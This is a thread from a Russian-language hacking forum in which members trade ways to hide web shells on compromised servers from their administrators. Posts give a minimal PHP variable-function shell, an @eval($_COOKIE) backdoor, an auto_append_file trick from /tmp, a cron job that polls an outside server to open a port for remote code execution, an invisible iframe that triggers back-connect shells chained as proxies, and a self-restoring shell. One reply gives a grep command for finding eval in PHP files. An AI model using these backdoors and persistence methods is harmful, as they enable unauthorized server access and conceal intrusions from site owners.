HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 01.11.2011, 03:22
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
Аппенд ко всем скриптам php_value auto_append_file "/tmp/httpconf.tmp"
Я заметил привычку прятать шеллы и прочие скрипты на сервере в папке /tmp/ Но видимо не все знают что содержимое папки /tmp/ живет до ребута, хоть сервера и редко ребутят, но все же.
 
Ответить с цитированием

  #12  
Старый 01.11.2011, 18:16
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_1[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
s.php?_=eval&_1=phpinfo();
 
Ответить с цитированием

  #13  
Старый 01.11.2011, 19:27
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от m0Hze  
m0Hze said:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_1[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
s.php?_=eval&_1=phpinfo();
только при register globals on.

Даже если бы rg on был бы, то ничего не вышло бы, т.к. eval не функция, поэтому ее нельзя в переменную заложить, но я понимаю что это просто пример был, можно использовать другие варинаты, например прямая запись в файл.
 
Ответить с цитированием

  #14  
Старый 12.11.2011, 17:12
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Я бы подходил тоньше в данному вопросу. А именно - использование методик сокрытия доступа , как такового в зависимости от условий каждого конкретного случая. К примеру VPS с одним сайтом, сетевые правила разрешают входящие соединения без явных ограничений ( тупо не перекрываются коннекты на 33, 404, 31337 etc произвольные открытые несанкционировано порты). В крон вбивается скрипт физически размещаемый вне локаций имеющих отношение к веб сервисам. Каждые 10-15 мин он проверяет наличие активирующей команды на на стороннем сервере ( банально в том же .txt) , если TRUE -> биндится порт - благо если сервисами не забит порт 8080. А далее удаленно выполняется к примеру тот же PHP. Кому-то может показаться чрезмерно массивным и излишне сомнительным. На практике же ,все достаточно просто в реализации. Пользуюсь и , как показывает статистика, доступ к ресурсам живет дольше чем в варианте постояттного физического размещения шела в директории веб-сервера.
 
Ответить с цитированием

  #15  
Старый 28.11.2011, 10:47
vasykas
Guest
Сообщений: n/a
Провел на форуме:
173402

Репутация: 37
По умолчанию

У меня такая задумка:

В любом модуле,плагине вообщем в любой странице

сайта вставляем прозрачный или под цвет сайта

(главное чтоб его не видно было)

на пример 2х2 код iframe и чтобы он находился

где нибудь в углу, и при клике по нему делался

back-connect на любой порт, получаем консоль

чем не полноценный шелл.Так же можно релизовать

проксю заместо кода back-connecta ставим редирект

на другой сайт с таким же iframe и так далее

N'ое количество сайтов.Чем не цепочка прокси.

А для GUI'шников на последнем N'ом сайте можно и WSO

Пусть попробуют проследить.
 
Ответить с цитированием

  #16  
Старый 30.11.2011, 14:12
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

2 vasykas:

Ты наверное не понял сути вопроса данного поста. Речь идет о том, как спрятать выполняемый код от администратора какого-либо ресурса, на котором необходимо разместить веб-шелл. Именно то, как спрятать вызываемый через iframe(как ты предлагаешь) код, именно и обсуждается в данном посте.
 
Ответить с цитированием

  #17  
Старый 11.01.2012, 07:41
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Вот мой способ(можно в иднекс запихнуть например):

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Если кто-то сменить пароль/удалить все возвращается на место

UPD. Поправил.
 
Ответить с цитированием

  #18  
Старый 11.01.2012, 16:16
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Вот мой способ(можно в иднекс запихнуть например):
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Если кто-то сменить пароль/удалить все возвращается на место
А ничего что переменная $b - не установлена?

У тебя по сути всегда будет $a!=$b.

Да и потом, переедет сайт на новый сервер, а там allow_url_fopen=Off, вот понавылазиет им варнингов.

Если нато уже пошло, то уж куда лучше @eval($_COOKIE[lol]); оно и не так палится.

Да и вообще никакой логики, файл шелла проверяется обычный shell.php, а заливаешь ты уже куда-то в глубь.
 
Ответить с цитированием

  #19  
Старый 11.01.2012, 16:18
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от Boolean  
Boolean said:
А ничего что переменная $b - не установлена?
У тебя по сути всегда будет $a!=$b.
Да и потом, переедет сайт на новый сервер, а там allow_url_fopen=Off, вот понавылазиет им варнингов.
Если нато уже пошло, то уж куда лучше @eval($_COOKIE[lol]); оно и не так палится.
Да и вообще никакой логики, файл шелла проверяется обычный shell.php, а заливаешь ты уже куда-то в глубь.
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]egrep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]H[/COLOR][COLOR="#DD0000"]"eval\("[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]find . -type f -name "*.php" -print[/COLOR][COLOR="#007700"]`[/COLOR][/COLOR
 
Ответить с цитированием

  #20  
Старый 11.01.2012, 16:18
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

2Boolean,

sorry. Там не $b = md5_file($b); а $b = md5_file($fileb);

>У тебя по сути всегда будет $a!=$b.

С чего это вдруг?

2Expl0ited,

+1
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ